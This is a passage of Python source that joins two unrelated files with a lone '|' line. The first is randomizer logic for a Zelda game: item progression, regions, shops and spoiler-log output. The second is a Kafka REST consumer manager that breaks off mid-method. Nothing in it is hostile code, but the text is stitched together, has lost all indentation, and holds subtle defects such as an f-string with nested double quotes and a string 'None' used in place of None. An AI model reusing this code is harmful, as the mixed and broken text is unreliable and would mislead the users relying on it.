return self.has('Fire Rod', player) or self.has('Lamp', player)
def can_flute(self, player):
lw = self.world.get_region('Light World', player)
return self.has('Ocarina', player) and lw.can_reach(self) and self.is_not_bunny(lw, player)
def can_melt_things(self, player):
return self.has('Fire Rod', player) or (self.has('Bombos', player) and self.has_sword(player))
def can_avoid_lasers(self, player):
return self.has('Mirror Shield', player) or self.has('Cane of Byrna', player) or self.has('Cape', player)
def is_not_bunny(self, region, player):
if self.has_Pearl(player):
return True
return region.is_light_world if self.world.mode[player] != 'inverted' else region.is_dark_world
def can_reach_light_world(self, player):
if True in [i.is_light_world for i in self.reachable_regions[player]]:
return True
return False
def can_reach_dark_world(self, player):
if True in [i.is_dark_world for i in self.reachable_regions[player]]:
return True
return False
def has_misery_mire_medallion(self, player):
return self.has(self.world.required_medallions[player][0], player)
def has_turtle_rock_medallion(self, player):
return self.has(self.world.required_medallions[player][1], player)
def collect(self, item, event=False, location=None):
if location:
self.locations_checked.add(location)
changed = False
if item.name.startswith('Progressive '):
if 'Sword' in item.name:
if self.has('Golden Sword', item.player):
pass
elif self.has('Tempered Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 4:
self.prog_items.add(('Golden Sword', item.player))
changed = True
elif self.has('Master Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 3:
self.prog_items.add(('Tempered Sword', item.player))
changed = True
elif self.has('Fighter Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 2:
self.prog_items.add(('Master Sword', item.player))
changed = True
elif self.world.difficulty_requirements[item.player].progressive_sword_limit >= 1:
self.prog_items.add(('Fighter Sword', item.player))
changed = True
elif 'Glove' in item.name:
if self.has('Titans Mitts', item.player):
pass
elif self.has('Power Glove', item.player):
self.prog_items.add(('Titans Mitts', item.player))
changed = True
else:
self.prog_items.add(('Power Glove', item.player))
changed = True
elif 'Shield' in item.name:
if self.has('Mirror Shield', item.player):
pass
elif self.has('Red Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 3:
self.prog_items.add(('Mirror Shield', item.player))
changed = True
elif self.has('Blue Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 2:
self.prog_items.add(('Red Shield', item.player))
changed = True
elif self.world.difficulty_requirements[item.player].progressive_shield_limit >= 1:
self.prog_items.add(('Blue Shield', item.player))
changed = True
elif 'Bow' in item.name:
if self.has('Silver Arrows', item.player):
pass
elif self.has('Bow', item.player):
self.prog_items.add(('Silver Arrows', item.player))
changed = True
else:
self.prog_items.add(('Bow', item.player))
changed = True
elif item.name.startswith('Bottle'):
if self.bottle_count(item.player) < self.world.difficulty_requirements[item.player].progressive_bottle_limit:
self.prog_items.add((item.name, item.player))
changed = True
elif event or item.advancement:
self.prog_items.add((item.name, item.player))
changed = True
self.stale[item.player] = True
if changed:
if not event:
self.sweep_for_events()
def remove(self, item):
if item.advancement:
to_remove = item.name
if to_remove.startswith('Progressive '):
if 'Sword' in to_remove:
if self.has('Golden Sword', item.player):
to_remove = 'Golden Sword'
elif self.has('Tempered Sword', item.player):
to_remove = 'Tempered Sword'
elif self.has('Master Sword', item.player):
to_remove = 'Master Sword'
elif self.has('Fighter Sword', item.player):
to_remove = 'Fighter Sword'
else:
to_remove = None
elif 'Glove' in item.name:
if self.has('Titans Mitts', item.player):
to_remove = 'Titans Mitts'
elif self.has('Power Glove', item.player):
to_remove = 'Power Glove'
else:
to_remove = None
elif 'Shield' in item.name:
if self.has('Mirror Shield', item.player):
to_remove = 'Mirror Shield'
elif self.has('Red Shield', item.player):
to_remove = 'Red Shield'
elif self.has('Blue Shield', item.player):
to_remove = 'Blue Shield'
else:
to_remove = 'None'
elif 'Bow' in item.name:
if self.has('Silver Arrows', item.player):
to_remove = 'Silver Arrows'
elif self.has('Bow', item.player):
to_remove = 'Bow'
else:
to_remove = None
if to_remove is not None:
try:
self.prog_items.remove((to_remove, item.player))
except ValueError:
return
# invalidate caches, nothing can be trusted anymore now
self.reachable_regions[item.player] = set()
self.stale[item.player] = True
def __getattr__(self, item):
if item.startswith('can_reach_'):
return self.can_reach(item[10])
#elif item.startswith('has_'):
# return self.has(item[4])
if item == '__len__':
return
raise RuntimeError('Cannot parse %s.' % item)
@unique
class RegionType(Enum):
LightWorld = 1
DarkWorld = 2
Cave = 3 # Also includes Houses
Dungeon = 4
@property
def is_indoors(self):
"""Shorthand for checking if Cave or Dungeon"""
return self in (RegionType.Cave, RegionType.Dungeon)
class Region(object):
def __init__(self, name, type, hint, player):
self.name = name
self.type = type
self.entrances = []
self.exits = []
self.locations = []
self.dungeon = None
self.shop = None
self.world = None
self.is_light_world = False # will be set aftermaking connections.
self.is_dark_world = False
self.spot_type = 'Region'
self.hint_text = hint
self.recursion_count = 0
self.player = player
def can_reach(self, state):
if state.stale[self.player]:
state.update_reachable_regions(self.player)
return self in state.reachable_regions[self.player]
def can_reach_private(self, state):
for entrance in self.entrances:
if entrance.can_reach(state):
if not self in state.path:
state.path[self] = (self.name, state.path.get(entrance, None))
return True
return False
def can_fill(self, item):
inside_dungeon_item = ((item.smallkey and not self.world.keyshuffle[item.player])
or (item.bigkey and not self.world.bigkeyshuffle[item.player])
or (item.map and not self.world.mapshuffle[item.player])
or (item.compass and not self.world.compassshuffle[item.player]))
sewer_hack = self.world.mode[item.player] == 'standard' and item.name == 'Small Key (Escape)'
if sewer_hack or inside_dungeon_item:
return self.dungeon and self.dungeon.is_dungeon_item(item) and item.player == self.player
return True
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Entrance(object):
def __init__(self, player, name='', parent=None):
self.name = name
self.parent_region = parent
self.connected_region = None
self.target = None
self.addresses = None
self.spot_type = 'Entrance'
self.recursion_count = 0
self.vanilla = None
self.access_rule = lambda state: True
self.player = player
def can_reach(self, state):
if self.parent_region.can_reach(state) and self.access_rule(state):
if not self in state.path:
state.path[self] = (self.name, state.path.get(self.parent_region, (self.parent_region.name, None)))
return True
return False
def connect(self, region, addresses=None, target=None, vanilla=None):
self.connected_region = region
self.target = target
self.addresses = addresses
self.vanilla = vanilla
region.entrances.append(self)
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
world = self.parent_region.world if self.parent_region else None
return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Dungeon(object):
def __init__(self, name, regions, big_key, small_keys, dungeon_items, player):
self.name = name
self.regions = regions
self.big_key = big_key
self.small_keys = small_keys
self.dungeon_items = dungeon_items
self.bosses = dict()
self.player = player
self.world = None
@property
def boss(self):
return self.bosses.get(None, None)
@boss.setter
def boss(self, value):
self.bosses[None] = value
@property
def keys(self):
return self.small_keys + ([self.big_key] if self.big_key else [])
@property
def all_items(self):
return self.dungeon_items + self.keys
def is_dungeon_item(self, item):
return item.player == self.player and item.name in [dungeon_item.name for dungeon_item in self.all_items]
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Boss(object):
def __init__(self, name, enemizer_name, defeat_rule, player):
self.name = name
self.enemizer_name = enemizer_name
self.defeat_rule = defeat_rule
self.player = player
def can_defeat(self, state):
return self.defeat_rule(state, self.player)
class Location(object):
def __init__(self, player, name='', address=None, crystal=False, hint_text=None, parent=None, player_address=None):
self.name = name
self.parent_region = parent
self.item = None
self.crystal = crystal
self.address = address
self.player_address = player_address
self.spot_type = 'Location'
self.hint_text = hint_text if hint_text is not None else 'Hyrule'
self.recursion_count = 0
self.staleness_count = 0
self.event = False
self.locked = False
self.always_allow = lambda item, state: False
self.access_rule = lambda state: True
self.item_rule = lambda item: True
self.player = player
def can_fill(self, state, item, check_access=True):
return self.always_allow(state, item) or (self.parent_region.can_fill(item) and self.item_rule(item) and (not check_access or self.can_reach(state)))
def can_reach(self, state):
if self.parent_region.can_reach(state) and self.access_rule(state):
return True
return False
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
world = self.parent_region.world if self.parent_region and self.parent_region.world else None
return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Item(object):
def __init__(self, name='', advancement=False, priority=False, type=None, code=None, pedestal_hint=None, pedestal_credit=None, sickkid_credit=None, zora_credit=None, witch_credit=None, fluteboy_credit=None, hint_text=None, player=None):
self.name = name
self.advancement = advancement
self.priority = priority
self.type = type
self.pedestal_hint_text = pedestal_hint
self.pedestal_credit_text = pedestal_credit
self.sickkid_credit_text = sickkid_credit
self.zora_credit_text = zora_credit
self.magicshop_credit_text = witch_credit
self.fluteboy_credit_text = fluteboy_credit
self.hint_text = hint_text
self.code = code
self.location = None
self.world = None
self.player = player
@property
def crystal(self):
return self.type == 'Crystal'
@property
def smallkey(self):
return self.type == 'SmallKey'
@property
def bigkey(self):
return self.type == 'BigKey'
@property
def map(self):
return self.type == 'Map'
@property
def compass(self):
return self.type == 'Compass'
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
# have 6 address that need to be filled
class Crystal(Item):
pass
@unique
class ShopType(Enum):
Shop = 0
TakeAny = 1
UpgradeShop = 2
class Shop(object):
def __init__(self, region, room_id, type, shopkeeper_config, custom, locked):
self.region = region
self.room_id = room_id
self.type = type
self.inventory = [None, None, None]
self.shopkeeper_config = shopkeeper_config
self.custom = custom
self.locked = locked
@property
def item_count(self):
return (3 if self.inventory[2] else
2 if self.inventory[1] else
1 if self.inventory[0] else
0)
def get_bytes(self):
# [id][roomID-low][roomID-high][doorID][zero][shop_config][shopkeeper_config][sram_index]
entrances = self.region.entrances
config = self.item_count
if len(entrances) == 1 and entrances[0].name in door_addresses:
door_id = door_addresses[entrances[0].name][0]+1
else:
door_id = 0
config |= 0x40 # ignore door id
if self.type == ShopType.TakeAny:
config |= 0x80
if self.type == ShopType.UpgradeShop:
config |= 0x10 # Alt. VRAM
return [0x00]+int16_as_bytes(self.room_id)+[door_id, 0x00, config, self.shopkeeper_config, 0x00]
def has_unlimited(self, item):
for inv in self.inventory:
if inv is None:
continue
if inv['max'] != 0 and inv['replacement'] is not None and inv['replacement'] == item:
return True
elif inv['item'] is not None and inv['item'] == item:
return True
return False
def clear_inventory(self):
self.inventory = [None, None, None]
def add_inventory(self, slot, item, price, max=0, replacement=None, replacement_price=0, create_location=False):
self.inventory[slot] = {
'item': item,
'price': price,
'max': max,
'replacement': replacement,
'replacement_price': replacement_price,
'create_location': create_location
}
class Spoiler(object):
def __init__(self, world):
self.world = world
self.hashes = {}
self.entrances = OrderedDict()
self.medallions = {}
self.playthrough = {}
self.unreachables = []
self.startinventory = []
self.locations = {}
self.paths = {}
self.metadata = {}
self.shops = []
self.bosses = OrderedDict()
def set_entrance(self, entrance, exit, direction, player):
if self.world.players == 1:
self.entrances[(entrance, direction, player)] = OrderedDict([('entrance', entrance), ('exit', exit), ('direction', direction)])
else:
self.entrances[(entrance, direction, player)] = OrderedDict([('player', player), ('entrance', entrance), ('exit', exit), ('direction', direction)])
def parse_data(self):
self.medallions = OrderedDict()
if self.world.players == 1:
self.medallions['Misery Mire'] = self.world.required_medallions[1][0]
self.medallions['Turtle Rock'] = self.world.required_medallions[1][1]
else:
for player in range(1, self.world.players + 1):
self.medallions[f'Misery Mire ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][0]
self.medallions[f'Turtle Rock ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][1]
self.startinventory = list(map(str, self.world.precollected_items))
self.locations = OrderedDict()
listed_locations = set()
lw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.LightWorld]
self.locations['Light World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in lw_locations])
listed_locations.update(lw_locations)
dw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.DarkWorld]
self.locations['Dark World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dw_locations])
listed_locations.update(dw_locations)
cave_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.Cave]
self.locations['Caves'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in cave_locations])
listed_locations.update(cave_locations)
for dungeon in self.world.dungeons:
dungeon_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.dungeon == dungeon]
self.locations[str(dungeon)] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dungeon_locations])
listed_locations.update(dungeon_locations)
other_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations]
if other_locations:
self.locations['Other Locations'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in other_locations])
listed_locations.update(other_locations)
self.shops = []
for shop in self.world.shops:
if not shop.custom:
continue
shopdata = {'location': str(shop.region),
'type': 'Take Any' if shop.type == ShopType.TakeAny else 'Shop'
}
for index, item in enumerate(shop.inventory):
if item is None:
continue
shopdata['item_{}'.format(index)] = "{} — {}".format(item['item'], item['price']) if item['price'] else item['item']
self.shops.append(shopdata)
for player in range(1, self.world.players + 1):
self.bosses[str(player)] = OrderedDict()
self.bosses[str(player)]["Eastern Palace"] = self.world.get_dungeon("Eastern Palace", player).boss.name
self.bosses[str(player)]["Desert Palace"] = self.world.get_dungeon("Desert Palace", player).boss.name
self.bosses[str(player)]["Tower Of Hera"] = self.world.get_dungeon("Tower of Hera", player).boss.name
self.bosses[str(player)]["Hyrule Castle"] = "Agahnim"
self.bosses[str(player)]["Palace Of Darkness"] = self.world.get_dungeon("Palace of Darkness", player).boss.name
self.bosses[str(player)]["Swamp Palace"] = self.world.get_dungeon("Swamp Palace", player).boss.name
self.bosses[str(player)]["Skull Woods"] = self.world.get_dungeon("Skull Woods", player).boss.name
self.bosses[str(player)]["Thieves Town"] = self.world.get_dungeon("Thieves Town", player).boss.name
self.bosses[str(player)]["Ice Palace"] = self.world.get_dungeon("Ice Palace", player).boss.name
self.bosses[str(player)]["Misery Mire"] = self.world.get_dungeon("Misery Mire", player).boss.name
self.bosses[str(player)]["Turtle Rock"] = self.world.get_dungeon("Turtle Rock", player).boss.name
if self.world.mode[player] != 'inverted':
self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Ganons Tower', player).bosses['bottom'].name
self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Ganons Tower', player).bosses['middle'].name
self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Ganons Tower', player).bosses['top'].name
else:
self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['bottom'].name
self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['middle'].name
self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['top'].name
self.bosses[str(player)]["Ganons Tower"] = "Agahnim 2"
self.bosses[str(player)]["Ganon"] = "Ganon"
if self.world.players == 1:
self.bosses = self.bosses["1"]
from Main import __version__ as ERVersion
self.metadata = {'version': ERVersion,
'logic': self.world.logic,
'mode': self.world.mode,
'retro': self.world.retro,
'weapons': self.world.swords,
'goal': self.world.goal,
'shuffle': self.world.shuffle,
'item_pool': self.world.difficulty,
'item_functionality': self.world.difficulty_adjustments,
'gt_crystals': self.world.crystals_needed_for_gt,
'ganon_crystals': self.world.crystals_needed_for_ganon,
'open_pyramid': self.world.open_pyramid,
'accessibility': self.world.accessibility,
'hints': self.world.hints,
'mapshuffle': self.world.mapshuffle,
'compassshuffle': self.world.compassshuffle,
'keyshuffle': self.world.keyshuffle,
'bigkeyshuffle': self.world.bigkeyshuffle,
'boss_shuffle': self.world.boss_shuffle,
'enemy_shuffle': self.world.enemy_shuffle,
'enemy_health': self.world.enemy_health,
'enemy_damage': self.world.enemy_damage,
'beemizer': self.world.beemizer,
'progressive': self.world.progressive,
'shufflepots': self.world.shufflepots,
'players': self.world.players,
'teams': self.world.teams
}
def to_json(self):
self.parse_data()
out = OrderedDict()
out['Entrances'] = list(self.entrances.values())
out.update(self.locations)
out['Starting Inventory'] = self.startinventory
out['Special'] = self.medallions
if self.hashes:
out['Hashes'] = {f"{self.world.player_names[player][team]} (Team {team+1})": hash for (player, team), hash in self.hashes.items()}
if self.shops:
out['Shops'] = self.shops
out['playthrough'] = self.playthrough
out['paths'] = self.paths
out['Bosses'] = self.bosses
out['meta'] = self.metadata
return json.dumps(out)
def to_file(self, filename):
self.parse_data()
with open(filename, 'w') as outfile:
outfile.write('ALttP Entrance Randomizer Version %s - Seed: %s\n\n' % (self.metadata['version'], self.world.seed))
outfile.write('Filling Algorithm: %s\n' % self.world.algorithm)
outfile.write('Players: %d\n' % self.world.players)
outfile.write('Teams: %d\n' % self.world.teams)
for player in range(1, self.world.players + 1):
if self.world.players > 1:
outfile.write('\nPlayer %d: %s\n' % (player, self.world.get_player_names(player)))
for team in range(self.world.teams):
outfile.write('%s%s\n' % (f"Hash - {self.world.player_names[player][team]} (Team {team+1}): " if self.world.teams > 1 else 'Hash: ', self.hashes[player, team]))
outfile.write('Logic: %s\n' % self.metadata['logic'][player])
outfile.write('Mode: %s\n' % self.metadata['mode'][player])
outfile.write('Retro: %s\n' % ('Yes' if self.metadata['retro'][player] else 'No'))
outfile.write('Swords: %s\n' % self.metadata['weapons'][player])
outfile.write('Goal: %s\n' % self.metadata['goal'][player])
outfile.write('Difficulty: %s\n' % self.metadata['item_pool'][player])
outfile.write('Item Functionality: %s\n' % self.metadata['item_functionality'][player])
outfile.write('Item Progression: %s\n' % self.metadata['progressive'][player])
outfile.write('Entrance Shuffle: %s\n' % self.metadata['shuffle'][player])
outfile.write('Crystals required for GT: %s\n' % self.metadata['gt_crystals'][player])
outfile.write('Crystals required for Ganon: %s\n' % self.metadata['ganon_crystals'][player])
outfile.write('Pyramid hole pre-opened: %s\n' % ('Yes' if self.metadata['open_pyramid'][player] else 'No'))
outfile.write('Accessibility: %s\n' % self.metadata['accessibility'][player])
outfile.write('Map shuffle: %s\n' % ('Yes' if self.metadata['mapshuffle'][player] else 'No'))
outfile.write('Compass shuffle: %s\n' % ('Yes' if self.metadata['compassshuffle'][player] else 'No'))
outfile.write('Small Key shuffle: %s\n' % ('Yes' if self.metadata['keyshuffle'][player] else 'No'))
outfile.write('Big Key shuffle: %s\n' % ('Yes' if self.metadata['bigkeyshuffle'][player] else 'No'))
outfile.write('Boss shuffle: %s\n' % self.metadata['boss_shuffle'][player])
outfile.write('Enemy shuffle: %s\n' % self.metadata['enemy_shuffle'][player])
outfile.write('Enemy health: %s\n' % self.metadata['enemy_health'][player])
outfile.write('Enemy damage: %s\n' % self.metadata['enemy_damage'][player])
outfile.write('Hints: %s\n' % ('Yes' if self.metadata['hints'][player] else 'No'))
outfile.write('Beemizer: %s\n' % self.metadata['beemizer'][player])
outfile.write('Pot shuffle %s\n' % ('Yes' if self.metadata['shufflepots'][player] else 'No'))
if self.entrances:
outfile.write('\n\nEntrances:\n\n')
outfile.write('\n'.join(['%s%s %s %s' % (f'{self.world.get_player_names(entry["player"])}: ' if self.world.players > 1 else '', entry['entrance'], '<=>' if entry['direction'] == 'both' else '<=' if entry['direction'] == 'exit' else '=>', entry['exit']) for entry in self.entrances.values()]))
outfile.write('\n\nMedallions:\n')
for dungeon, medallion in self.medallions.items():
outfile.write(f'\n{dungeon}: {medallion}')
if self.startinventory:
outfile.write('\n\nStarting Inventory:\n\n')
outfile.write('\n'.join(self.startinventory))
outfile.write('\n\nLocations:\n\n')
outfile.write('\n'.join(['%s: %s' % (location, item) for grouping in self.locations.values() for (location, item) in grouping.items()]))
outfile.write('\n\nShops:\n\n')
outfile.write('\n'.join("{} [{}]\n {}".format(shop['location'], shop['type'], "\n ".join(item for item in [shop.get('item_0', None), shop.get('item_1', None), shop.get('item_2', None)] if item)) for shop in self.shops))
outfile.write('\n\nPlaythrough:\n\n')
outfile.write('\n'.join(['%s: {\n%s\n}' % (sphere_nr, '\n'.join([' %s: %s' % (location, item) for (location, item) in sphere.items()] if sphere_nr != '0' else [f' {item}' for item in sphere])) for (sphere_nr, sphere) in self.playthrough.items()]))
if self.unreachables:
outfile.write('\n\nUnreachable Items:\n\n')
outfile.write('\n'.join(['%s: %s' % (unreachable.item, unreachable) for unreachable in self.unreachables]))
outfile.write('\n\nPaths:\n\n')
path_listings = []
for location, path in sorted(self.paths.items()):
path_lines = []
for region, exit in path:
if exit is not None:
path_lines.append("{} -> {}".format(region, exit))
else:
path_lines.append(region)
path_listings.append("{}\n {}".format(location, "\n => ".join(path_lines)))
outfile.write('\n'.join(path_listings))
|
from asyncio import Lock
from collections import defaultdict, namedtuple
from functools import partial
from http import HTTPStatus
from kafka import KafkaConsumer
from kafka.errors import IllegalStateError, KafkaConfigurationError, KafkaError
from kafka.structs import OffsetAndMetadata, TopicPartition
from karapace.kafka_rest_apis.error_codes import RESTErrorCodes
from karapace.karapace import empty_response, KarapaceBase
from karapace.serialization import InvalidMessageHeader, InvalidPayload, SchemaRegistryDeserializer
from karapace.utils import convert_to_int
from struct import error as UnpackError
from typing import Tuple
from urllib.parse import urljoin
import asyncio
import base64
import logging
import time
import ujson
import uuid
KNOWN_FORMATS = {"json", "avro", "binary", "jsonschema", "protobuf"}
OFFSET_RESET_STRATEGIES = {"latest", "earliest"}
TypedConsumer = namedtuple("TypedConsumer", ["consumer", "serialization_format", "config"])
class ConsumerManager:
def __init__(self, config: dict) -> None:
self.config = config
self.hostname = f"http://{self.config["advertised_hostname"]}:{self.config["port"]}"
self.log = logging.getLogger("RestConsumerManager")
self.deserializer = SchemaRegistryDeserializer(config=config)
self.consumers = {}
self.consumer_locks = defaultdict(Lock)
def new_name(self) -> str:
name = str(uuid.uuid4())
self.log.debug("Generated new consumer name: %s", name)
return name
@staticmethod
def _assert(cond: bool, code: HTTPStatus, sub_code: int, message: str, content_type: str) -> None:
if not cond:
KarapaceBase.r(content_type=content_type, status=code, body={"message": message, "error_code": sub_code})
def _assert_consumer_exists(self, internal_name: Tuple[str, str], content_type: str) -> None:
if internal_name not in self.consumers:
KarapaceBase.not_found(
message=f"Consumer for {internal_name} not found among {list(self.consumers.keys())}",
content_type=content_type,
sub_code=RESTErrorCodes.CONSUMER_NOT_FOUND.value,
)
@staticmethod
def _assert_positive_number(
container: dict,
key: str,
content_type: str,
code: HTTPStatus = HTTPStatus.INTERNAL_SERVER_ERROR,
sub_code: int = RESTErrorCodes.INVALID_VALUE.value,
) -> None:
ConsumerManager._assert_has_key(container, key, content_type)
ConsumerManager._assert(
isinstance(container[key], int) and container[key] >= 0,
code=code,
sub_code=sub_code,
content_type=content_type,
message=f"{key} must be a positive number",
)
@staticmethod
def _assert_has_key(element: dict, key: str, content_type: str) -> None:
ConsumerManager._assert(
key in element,
code=HTTPStatus.INTERNAL_SERVER_ERROR,
sub_code=RESTErrorCodes.INVALID_VALUE.value,
message=f"{key} missing from {element}",
content_type=content_type,
)
@staticmethod
def _has_topic_and_partition_keys(topic_data: dict, content_type: str):
for k in ["topic", "partition"]:
ConsumerManager._assert_has_key(topic_data, k, content_type)
@staticmethod
def _topic_and_partition_valid(cluster_metadata: dict, topic_data: dict, content_type: str):
ConsumerManager._has_topic_and_partition_keys(topic_data, content_type)
topic = topic_data["topic"]
partition = topic_data["partition"]
if topic not in cluster_metadata["topics"]:
KarapaceBase.not_found(
message=f"Topic {topic} not found", content_type=content_type, sub_code=RESTErrorCodes.TOPIC_NOT_FOUND.value
)
partitions = {pi["partition"] for pi in cluster_metadata["topics"][topic]["partitions"]}
if partition not in partitions:
KarapaceBase.not_found(
message=f"Partition {partition} not found for topic {topic}",
content_type=content_type,
sub_code=RESTErrorCodes.PARTITION_NOT_FOUND.value,
)
@staticmethod
def create_internal_name(group_name: str, consumer_name: str) -> Tuple[str, str]:
return group_name, consumer_name
@staticmethod
def _validate_create_consumer(request: dict, content_type: str) -> None:
consumer_data_valid = partial(
ConsumerManager._assert,
content_type=content_type,
code=HTTPStatus.UNPROCESSABLE_ENTITY,
sub_code=RESTErrorCodes.INVALID_CONSUMER_PARAMETERS.value,
)
request["format"] = request.get("format", "binary")
consumer_data_valid(request["format"] in KNOWN_FORMATS, message="Invalid format type")
min_bytes_key = "fetch.min.bytes"
consumer_data_valid(
min_bytes_key not in request or isinstance(request[min_bytes_key], int) and request[min_bytes_key] >= -1,
message=f"Expected {min_bytes_key} to be >= -1",
)
auto_reset_key = "auto.offset.reset"
consumer_data_valid(
cond=auto_reset_key not in request or request[auto_reset_key].lower() in OFFSET_RESET_STRATEGIES,
message=f"Invalid value bar for configuration {auto_reset_key}: "
f"String must be one of: {OFFSET_RESET_STRATEGIES}",
)
@staticmethod
def _illegal_state_fail(message: str, content_type: str) -> None:
ConsumerManager._assert(
cond=False,
code=HTTPStatus.CONFLICT,
sub_code=RESTErrorCodes.ILLEGAL_STATE.value,
content_type=content_type,
message=message,
)
@staticmethod
def _update_partition_assignments(consumer: KafkaConsumer):
# This is (should be?) equivalent to calling poll on the consumer.
# which would return 0 results, since the subscription we just created will mean
# a rejoin is needed, which skips the actual fetching. Nevertheless, an actual call to poll is to be avoided
# and a better solution to this is desired (extend the consumer??)
# pylint: disable=protected-access
consumer._coordinator.poll()
if not consumer._subscription.has_all_fetch_positions():
consumer._update_fetch_positions(consumer._subscription.missing_fetch_positions())
# pylint: enable=protected-access
# external api below
# CONSUMER
async def create_consumer(self, group_name: str, request_data: dict, content_type: str):
group_name = group_name.strip("/")
self.log.info("Create consumer request for group %s", group_name)
consumer_name = request_data.get("name") or self.new_name()
internal_name = self.create_internal_name(group_name, consumer_name)
async with self.consumer_locks[internal_name]:
if internal_name in self.consumers:
self.log.error("Error creating duplicate consumer in group %s with id %s", group_name, consumer_name)
KarapaceBase.r(
status=HTTPStatus.CONFLICT,
content_type=content_type,
body={
"error_code": RESTErrorCodes.CONSUMER_ALREADY_EXISTS.value,
"message": f"Consumer {consumer_name} already exists",
},
)
self._validate_create_consumer(request_data, content_type)
self.log.info(
"Creating new consumer in group %s with id %s and request_info %r", group_name, consumer_name, request_data
)
for k in ["consumer.request.timeout.ms", "fetch_min_bytes"]:
convert_to_int(request_data, k, content_type)
try:
enable_commit = request_data.get("auto.commit.enable", self.config["consumer_enable_auto_commit"])
if isinstance(enable_commit, str):
enable_commit = enable_commit.lower() == "true"
request_data["consumer.request.timeout.ms"] = request_data.get(
"consumer.request.timeout.ms", self.config["consumer_request_timeout_ms"]
)
request_data["auto.commit.enable"] = enable_commit
request_data["auto.offset.reset"] = request_data.get("auto.offset.reset", "earliest")
fetch_min_bytes = request_data.get("fetch.min.bytes", self.config["fetch_min_bytes"])
c = await self.create_kafka_consumer(fetch_min_bytes, group_name, internal_name, request_data)
except KafkaConfigurationError as e:
KarapaceBase.internal_error(str(e), content_type)
self.consumers[internal_name] = TypedConsumer(
consumer=c, serialization_format=request_data["format"], config=request_data
)
base_uri = urljoin(self.hostname, f"consumers/{group_name}/instances/{consumer_name}")
KarapaceBase.r(content_type=content_type, body={"base_uri": base_uri, "instance_id": consumer_name})
async def create_kafka_consumer(self, fetch_min_bytes, group_name, internal_name, request_data):
while True:
try:
session_timeout_ms = self.config["session_timeout_ms"]
request_timeout_ms = max(
session_timeout_ms,
KafkaConsumer.DEFAULT_CONFIG["request_timeout_ms"],
request_data["consumer.request.timeout.ms"],
)
c = KafkaConsumer(
bootstrap_servers=self.config["bootstrap_uri"],
client_id=internal_name,
security_protocol=self.config["security_protocol"],
ssl_cafile=self.config["ssl_cafile"],
ssl_certfile=self.config["ssl_certfile"],
ssl_keyfile=self.config["ssl_keyfile"],
sasl_mechanism=self.config["sasl_mechanism"],
sasl_plain_username=self.config["sasl_plain_username"],
sasl_plain_password=self.config["sasl_plain_password"],
group_id=group_name,
fetch_min_bytes=fetch_min_bytes,
fetch_max_bytes=self.config["consumer_request_max_bytes"],
request_timeout_ms=request_timeout_ms,
enable_auto_commit=request_data["auto.commit.enable"],
auto_offset_reset=request_data["auto.offset.reset"],
session_timeout_ms=session_timeout_ms,
)
return c
except: # pylint: disable=bare-except
self.log.exception("Unable to create consumer, retrying")
await asyncio.sleep(1)
async def delete_consumer(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Deleting consumer for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
try:
c = self.consumers.pop(internal_name)
c.consumer.close()
self.consumer_locks.pop(internal_name)
except: # pylint: disable=bare-except
self.log.exception("Unable to properly dispose of consumer")
finally:
empty_response()
# OFFSETS
async def commit_offsets(
self, internal_name: Tuple[str, str], content_type: str, request_data: dict, cluster_metadata: dict
):
self.log.info("Committing offsets for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
if request_data:
self._assert_has_key(request_data, "offsets", content_type)
payload = {}
for el in request_data.get("offsets", []):
for k in ["partition", "offset"]:
convert_to_int(el, k, content_type)
# If we commit for a partition that does not belong to this consumer, then the internal error raised
# is marked as retriable, and thus the commit method will remain blocked in what looks like an infinite loop
self._topic_and_partition_valid(cluster_metadata, el, content_type)
payload[TopicPartition(el["topic"], el["partition"])] = OffsetAndMetadata(el["offset"] + 1, None)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
payload = payload or None
try:
consumer.commit(offsets=payload)
except KafkaError as e:
KarapaceBase.internal_error(message=f"error sending commit request: {e}", content_type=content_type)
empty_response()
async def get_offsets(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
self.log.info("Retrieving offsets for %s", internal_name)
